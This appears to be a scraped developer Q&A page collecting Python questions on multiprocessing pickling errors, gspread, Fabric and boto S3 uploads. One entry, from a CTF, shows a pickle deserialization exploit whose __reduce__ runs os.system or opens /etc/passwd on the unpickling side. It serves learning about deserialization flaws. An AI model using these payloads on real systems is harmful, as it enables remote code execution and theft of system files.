I would like to use the multiprocess package in this code.
I've tried to call the function create_new_population and distribute the work across 8 processors, but when I do I get a pickle error.
Normally the function would run like this: self.create_new_population(self.pop_size)
I try to distribute the work like this:
f = self.create_new_population
pop = self.pop_size // 8
self.current_generation = [pool.apply_async(f, (pop,)) for _ in range(8)]
I get Can't pickle local object 'exhaust.__init__.<locals>.tour_select'
or PermissionError: [WinError 5] Access is denied
I've read this thread carefully and also tried to bypass the error using an approach from Steven Bethard to allow method pickling/unpickling via copyreg:
def _pickle_method(method):
def _unpickle_method(func_name, obj, cls):
I also tried to use pathos package without any luck.
I know that the code should be called under an if __name__ == '__main__': block, but I would like to know if this can be done with as few changes to the code as possible.
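For reference, here is a minimal sketch of the pattern that usually avoids these pickle errors with multiprocess (or multiprocessing): the worker is a module-level function, so it can be pickled by name, and the pool lives under the __main__ guard. The names below (create_chunk, pop_size) are placeholders, not the actual project code.

from multiprocess import Pool

def create_chunk(chunk_size):
    # a module-level function pickles by name; a function defined inside
    # __init__ (like tour_select in the error above) cannot be pickled
    return [i * i for i in range(chunk_size)]  # placeholder work

if __name__ == '__main__':
    pop_size = 800
    chunk = pop_size // 8
    with Pool(8) as pool:
        results = [pool.apply_async(create_chunk, (chunk,)) for _ in range(8)]
        new_population = [item for r in results for item in r.get()]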
Related
I've spent the last few hours on the multiprocessing tool in Python. The last thing I did was to set up a Pool with a few workers to execute a function. Everything was going fine and multiprocessing was working.
After I switched to another file to implement my multiprocessing insights in my actual project, the code was running, but the .get() invocation following the apply_async(func, args) never returned anything.
I thought it was due to a faulty implementation, but it turned out to be something else. I went back to the first file where I did my experiments and tried to run it again. Suddenly multiprocessing didn't work there anymore either. Apart from trying to implement multiprocessing in my project, I didn't really change anything else in the code or the environment. The only thing possibly correlated with the problem is that I tried to execute an older version of the __main__ program in the same environment, which led to an error because that __main__ file relied on newer project files to execute.
Here's the code I used for the simple experiment:
import torch.multiprocessing as mp
import torch
import time

# that's code from my project
import data.preprocessor as preprocessor
import eco_neat_t1_cfg as cfg

def f(x):
    return x * x

if __name__ == "__main__":
    p = mp.Pool(1)
    j = p.apply_async(f, (5,))
    r = j.get(timeout=10)
    print(r)
So nothing too complicated here; it should actually work.
However, there is no result being returned. I notice the CPU is working according to the number of processes invoked, so I assume it is caught in some kind of loop.
I am running on Windows 10, with Python running in Anaconda's Spyder with the IPython console.
When I close Spyder and all Python processes, restart and execute it again, it works, but only if I am not importing my own code. Once I import eco_neat_t1_cfg as cfg, which is basically only a dataclass with a few other imports, the program won't return anything and gets stuck in the execution.
I am getting a Reloaded modules: data, data.preprocessor, data.generator message. This is probably because cfg also imports data.preprocessor. The weird thing is, if I now delete all imports from the source code, save the file and run it, it works again, although the imports are not even specified in the code anymore... however, every time I restart Python and Spyder I need to specify the modules again, of course.
Also, the simple code works after deleting all the imports, but the more complicated code I actually want to execute does not, although it was perfectly fine before all this happened. Now I am getting a PicklingError: Can't pickle <class 'neat.genotype.genome.Pickleable_Genome'>: it's not the same object as neat.genotype.genome.Pickleable_Genome. As I said, there were no problems with the pickling before. That's the "more complicated" piece of code I pass to apply_async:
def create_net(genome):
    net = feedforward.Net("cpu", genome, 1.0)
    inp = torch.ones(2, 5)
    input = torch.FloatTensor(inp).view(1, -1).squeeze()
    res = net(input)
    return res
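A side note on that PicklingError: "it's not the same object as neat.genotype.genome.Pickleable_Genome" usually means the class object was replaced (re-imported or reloaded) between creating the instance and pickling it, so pickle's lookup by qualified name finds a different object. A rough sketch of how Spyder's "Reloaded modules" behaviour could produce exactly that message (the module path is taken from the error message; the constructor call and its arguments are assumed):

import importlib
import pickle
import neat.genotype.genome as genome_mod  # module path from the error message

g = genome_mod.Pickleable_Genome()   # instance of the class as originally imported (args assumed)
importlib.reload(genome_mod)         # roughly what Spyder's "Reloaded modules" does
pickle.dumps(g)                      # PicklingError: ... it's not the same object as ...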
What I did was delete all the pycache directories in my project, reset the Spyder settings, and update Anaconda and Spyder. I also looked at every piece of code in the cfg file, but even if I delete every line, including the imports, the program will not work. Nothing helps; I really don't have any idea what the problem is or how to solve it. Maybe one of you has an idea.
One more thing: if I manually interrupt the execution (CTRL + C), I can see in the stack trace that the processes are waiting.
File "C:/Users/klein/Desktop/bak/test/eco_neat_t1/blabla.py", line 72, in <module>
r = j.get(timeout=10)
File "C:\Users\klein\Anaconda3\envs\eco_neat\lib\multiprocessi\pool.py", line 651, in get
self.wait(timeout)
File "C:\Users\klein\Anaconda3\envs\eco_neat\lib\multiprocessing\pool.py", line 648, in wait
self._event.wait(timeout)
File "C:\Users\klein\Anaconda3\envs\eco_neat\lib\threading.py", line 552, in wait
signaled = self._cond.wait(timeout)
Cheers
SOLUTION: The bug was my directory structure, which somehow led Python to fail. I had both of my __main__ test files running in the root/tests/eco_neat_t1 directory. I created two new files, t1_cfg and t1, with the same content in the root directory. Suddenly everything works fine... weird world.
I'm trying to perform a cPickle deserialization for a CTF. I'm working on an exploit for a deserialization vuln, trying to generate a Python class that will run a command on a server when deserialized, following this example: https://lincolnloop.com/blog/playing-pickle-security/
import os
import cPickle

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('ls',))

shellcode = cPickle.dumps(Exploit())
print shellcode
The thing is that the server I'm trying to exploit doesn't have the "os" or the "subprocess" modules included, so I'm not able to run shell commands. I'm trying to read local files with objects generated with the following code:
class Exploit(object):
    def __reduce__(self):
        data = open("/etc/passwd", "rb").read()
        return data

shellcode = cPickle.dumps(Exploit())
print shellcode
but when I try to run it to generate the payload, it tries to read my local /etc/passwd file and fails with the error message:
shellcode = cPickle.dumps(Exploit())
cPickle.PicklingError: Can't pickle <__main__.Exploit object at
0x7f14ef4b39d0>: attribute lookup __main__.root:x:0:0:root:/root:/b
in/sh (/etc/passwd continues)
When I run the first example, it generates the following pickle successfully (and doesn't try to do an ls on my machine):
cposix
system
p1
(S'ls'
p2
tp3
Rp4
.
So why is it not working with my code?
"Whenever you try to pickle an object, there will be some properties that may not serialize well. For instance, an open file handle In this cases, pickle won't know how to handle the object and will throw an error."
What's the exact usage of __reduce__ in Pickler
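The short answer is in what __reduce__ returns. When __reduce__ returns a string, pickle treats it as the name of a global variable and tries to look it up, which is why the error above shows an attribute lookup on the contents of /etc/passwd. To have code run on the unpickling side, __reduce__ has to return a tuple: a callable plus a tuple of arguments, and that callable is invoked when the pickle is loaded, not when it is dumped. A minimal sketch of that contract (a benign example; getting the file contents back out of the target is a separate problem):

import pickle

class OpenFile(object):
    def __reduce__(self):
        # return (callable, args): the callable is invoked when the pickle
        # is *loaded*, not when it is dumped
        return (open, ('/etc/passwd', 'rb'))

payload = pickle.dumps(OpenFile())
# pickle.loads(payload) calls open('/etc/passwd', 'rb') on the loading side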
I've actually asked a question about multiprocessing before, but now I'm running into a weird shortcoming with the type of data that gets returned.
I'm using Gspread to interface with Google's Sheets API and get a "worksheet" object back.
This object, or an aspect of this object, is apparently incompatible with multiprocessing due to being "unpickle-able". Please see output:
File "/usr/lib64/python2.7/multiprocessing/pool.py", line 554, in get
raise self._value
multiprocessing.pool.MaybeEncodingError: Error sending result: '[<Worksheet 'Activation Log' id:o12345wm>]'.
Reason: 'UnpickleableError(<ssl.SSLContext object at 0x1e4be30>,)'
The code I'm using is essentially:
import multiprocessing.pool
from oauth2client.client import SignedJwtAssertionCredentials
import gspread

sheet = 1

pool = multiprocessing.pool.Pool(1)
p = pool.apply_async(get_a_worksheet, args=(sheet,))  # get_a_worksheet is defined elsewhere
worksheet = p.get()
And the script fails while attempting to "get" the results. The get_a_worksheet function returns a Gspread worksheet object that allows me to manipulate the remote sheet. Being able to upload changes to the document is important here - I'm not just trying to reference data, I need to alter it as well.
Does anyone know how I can run a subprocess in a separate and monitorable thread, and get an arbitrary (or custom) object type safely out of it at the end? Does anyone know what makes the ssl.SSLContext object special and "unpickleable"?
Thanks all in advance.
Multiprocessing uses pickling to pass objects between processes, so I do not believe you can use multiprocessing to hand back an object that is unpicklable.
I ended up writing a solution around this shortcoming by having the sub-process simply perform the necessary work inside itself rather than return a Worksheet object.
What I ended up with was about half a dozen function and multiprocessing function pairs, each one written to do what I needed done, but inside of a sub-process so that it could be monitored and timed.
A hierarchical map would look something like:
Main()
    check_spreadsheet_for_a_string()
        check_spreadsheet_for_a_string_worker()
    get_hash_of_spreadsheet()
        get_hash_of_spreadsheet_worker()
    ... etc
Where the "worker" functions are the functions called in the multiprocessing setup, and the regular functions above them manage the sub-process and time it to make sure the overall program doesn't halt if the call to gspread internals hangs or takes too long.
I've tried really hard to find this but no luck - I'm sure it's possible, I just can't find an example or figure out the syntax for myself.
I want to use fabric as a library
I want 2 sets of hosts
I want to reuse the same functions for these different sets of hosts (and so cannot use the @roles decorator on said functions)
So I think I need:
from fabric.api import execute, run, env

NODES = ['192.168.56.141', '192.168.56.152']
env.roledefs = {'head': ['localhost'], 'nodes': NODES}
env.user('r4space')

def testfunc():
    run('touch ./fred.txt')

execute(testfunc(), <somehow specify 'head' or 'nodes' as my hosts list and user>)
I've tried a whole range of syntax (hosts=NODES, -H NODES, user='r4space', and much more) but I either get a syntax error or the prompt from host_string = raw_input("No hosts found. Please specify (single)...
If it makes a difference, ultimately my function defs would be in a separate file that I import into main where hosts etc are defined and execute is called.
Thanks for any help!
You have some errors in your code.
env.user('r4space') is wrong. Should be env.user = 'r4space'
When you use execute, the first parameter should be a callable. You have used the return value of the function testfunc.
I think if you fix the last line, it will work:
execute(testfunc, hosts = NODES)
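For completeness, a sketch of how the same task could then be reused against both host sets; the host lists mirror the question and env.user uses the assignment form noted above:

from fabric.api import execute, run, env

NODES = ['192.168.56.141', '192.168.56.152']
env.roledefs = {'head': ['localhost'], 'nodes': NODES}
env.user = 'r4space'

def testfunc():
    run('touch ./fred.txt')

if __name__ == '__main__':
    execute(testfunc, hosts=env.roledefs['head'])  # run on the head host(s)
    execute(testfunc, hosts=NODES)                 # reuse the same function on the nodes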
So I basically wrote a function to upload a file to S3 using key.set_contents_from_file(), but I'm finding it sometimes throws this error:
<Error>
<Code>BadDigest</Code>
<Message>The Content-MD5 you specified did not match what we received.</Message>
<ExpectedDigest>TPCms2v7Hu43d+yoJHbBIw==</ExpectedDigest>
<CalculatedDigest>QSdeCsURt0oOlL3NxxGwbA==</CalculatedDigest>
<RequestId>2F0D40F29AA6DC94</RequestId>
<HostId>k0AC6vaV+Ip8K6kD0F4fkbdS13UdxoJ3X1M76zFUR/ZQgnIxlGJrAJ8BeQlKQ4m6</HostId>
</Error>
The function:
def uploadToS3(filepath, keyPath, version):
    bucket = connectToS3()  # simply gets my bucket and returns it
    key = Key(bucket)
    f = open(filepath, 'r')
    key.name = keyPath
    key.set_metadata('version', version)
    key.set_contents_from_file(f)  # offending line
    key.make_public()
    key.close()
If I open a Python shell and call it manually, it works without a hitch; however, the way I have to invoke it (where it doesn't work) involves calling it from a subprocess. This is because the caller is a Python 3 script, 2to3 didn't work, and I didn't want to deal with the years-old branches that add Python 3 support.
Anyway, that does seem to run it correctly: it gets into the function and the inputs are what's expected (I had them printed out), but the offending line keeps throwing this error. I have no idea what the cause is.
Is it possible the bucket isn't being set properly? I feel like if that were the case, calling Key(bucket) would have thrown an error.
So I essentially run the script below, once as a subprocess called from a Python 3 script, and once from the console:
sudo -u www-data python botoUtilities.py uploadToS3 /path/to/file /key/path
I have this logic inside to pass it to the correct function
func = None
args = []
for arg in sys.argv[1:]:
    if not func:
        # the first argument names the function to call
        g = globals()
        func = g[arg]
    else:
        # remaining arguments are positional; coerce booleans
        if arg == 'True':
            args.append(True)
        elif arg == 'False':
            args.append(False)
        else:
            args.append(arg)
if func:
    wrapper(func, args)
It runs in both cases (I write the args out to a file to check them), but only in the console case does it avoid the error. This is incredibly frustrating; I can't figure out what is done differently. All I know is that I can't seem to send data to S3 with boto when it is run from a subprocess.
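Not an answer, but one thing worth ruling out: boto computes the Content-MD5 from whatever it reads out of the file object, so opening the file in text mode or handing over a file whose position is not at the start can produce exactly this kind of BadDigest mismatch. A sketch of the helper with the file opened in binary mode and rewound before the upload (an assumption about the cause, not a confirmed fix):

def uploadToS3(filepath, keyPath, version):
    bucket = connectToS3()  # as in the original
    key = Key(bucket)
    key.name = keyPath
    key.set_metadata('version', version)
    with open(filepath, 'rb') as f:  # binary mode: the bytes boto hashes match the bytes on disk
        f.seek(0)                    # make sure the upload starts at the beginning of the file
        key.set_contents_from_file(f)
    key.make_public()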